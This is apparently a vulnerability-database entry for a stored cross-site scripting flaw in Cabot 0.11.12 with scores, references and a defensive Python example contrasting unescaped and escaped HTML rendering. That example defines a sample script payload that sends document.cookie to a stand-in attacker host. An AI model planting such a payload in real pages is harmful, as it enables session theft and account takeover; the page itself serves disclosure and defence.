CVE-2020-25449

MEDIUM

Arachnys Cabot 0.11.12 - Cross-Site Scripting via Address Column

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-25449, a PoC published by Abhiram V.

AI-analyzed exploit summary: This is a technical writeup detailing a persistent (stored) XSS vulnerability in Cabot 0.11.12, where a malicious payload placed in the 'Address' field of a new instance executes when an admin views the resulting notification, which can lead to account takeover.

Description

Cross-Site Scripting (XSS) vulnerability in Arachnys Cabot 0.11.12 can be exploited via the Address column: the value is stored and later rendered to other users without adequate output encoding.
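The following is an added illustration, not code from Cabot or from the exploit-db writeup. It models the stored-XSS pattern the summary and description above describe (a user-controlled Address value rendered into HTML unescaped) next to its hardened form, and includes the check a reviewer or regression test would use to confirm whether a payload survives rendering. The Instance class, the field names, the payload, the rendering functions and the sample records are all constructed for this example and do not reproduce Cabot's actual models or templates.

```python
import html
from dataclasses import dataclass


# Hypothetical model of a Cabot "instance" record. The address field is the
# attacker-controlled value: any account allowed to create instances can set
# it (assumption: field names follow the advisory, not Cabot's ORM model).
@dataclass
class Instance:
    name: str
    address: str


# Constructed payload for illustration only (not taken from the writeup).
PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'

# Constructed sample records: one benign, one carrying the payload.
BENIGN_INSTANCE = Instance(name="db-02", address="10.0.0.5:5432")
MALICIOUS_INSTANCE = Instance(name="db-01", address=PAYLOAD)


def render_instance_unsafe(inst: Instance) -> str:
    """Vulnerable pattern: untrusted values concatenated straight into HTML.

    A template engine with autoescaping disabled, or a Django template that
    passes the value through |safe or mark_safe, produces the same result.
    """
    return (
        "<table><tr><th>Name</th><th>Address</th></tr>"
        f"<tr><td>{inst.name}</td><td>{inst.address}</td></tr></table>"
    )


def render_instance_safe(inst: Instance) -> str:
    """Hardened form: every untrusted value is HTML-escaped at output time.

    quote=True also escapes ' and ", so the value stays inert inside attribute
    values as well as element content.
    """
    return (
        "<table><tr><th>Name</th><th>Address</th></tr>"
        f"<tr><td>{html.escape(inst.name, quote=True)}</td>"
        f"<td>{html.escape(inst.address, quote=True)}</td></tr></table>"
    )


def escaped_form(value: str) -> str:
    """What a correctly encoded copy of `value` looks like in the page."""
    return html.escape(value, quote=True)


def payload_survives(rendered: str, payload: str) -> bool:
    """Regression check: True when the raw payload appears verbatim in the
    rendered HTML (a browser would execute it), False when only its escaped
    form, or nothing, appears."""
    return payload in rendered


def audit(renderer, inst: Instance, payload: str) -> dict:
    """Run one renderer over a record and report the two facts a reviewer
    wants: did the raw payload survive, and is the encoded form present."""
    out = renderer(inst)
    return {
        "raw_payload_present": payload_survives(out, payload),
        "escaped_payload_present": escaped_form(payload) in out,
    }


if __name__ == "__main__":
    for name, fn in (("unsafe", render_instance_unsafe), ("safe", render_instance_safe)):
        print(name, audit(fn, MALICIOUS_INSTANCE, PAYLOAD))
```

In a Django application such as Cabot the practical fix is output-side: keep template autoescaping on for this field and never route it through `|safe` or `mark_safe`. A Content Security Policy limits what an injected script can do but does not remove the injection itself, so it is a mitigation, not the fix.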

Exploits (1)

exploitdb WRITEUP
by Abhiram V · text · webapps · multiple
https://www.exploit-db.com/exploits/48791


Classification: Writeup (90%)
Attack Type: XSS
Complexity: Moderate
Reliability: Reliable
Target: Cabot 0.11.12
Auth required: yes
Prerequisites: User account with permissions to create instances · Admin interaction with the notification
Analyzed by devstral-2 on Feb 18, 2026

References (4)

Core References (4)

Exploit, Third Party Advisory (x_refsource_MISC)
https://itsmeanonartist.tech/blogs/blog2.html

Third Party Advisory, VDB Entry (x_refsource_MISC)
https://www.exploit-db.com/exploits/48791

Exploit, Third Party Advisory, VDB Entry (x_refsource_MISC)
https://packetstormsecurity.com/files/159070/Cabot-0.11.12-Cross-Site-Scripting.html

Exploit, Third Party Advisory (x_refsource_MISC)
https://www.exploitalert.com/view-details.html?id=36106

Scores

CVSS v3.1: 4.8 (Medium)
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Attack Vector: NETWORK
EPSS: 0.0052 (67.4th percentile)

Details

CWE
CWE-79
Status published
Products (2)
arachnys/cabot 0.11.12
pypi/cabot (PyPI)
Published Dec 04, 2020
Tracked Since Feb 18, 2026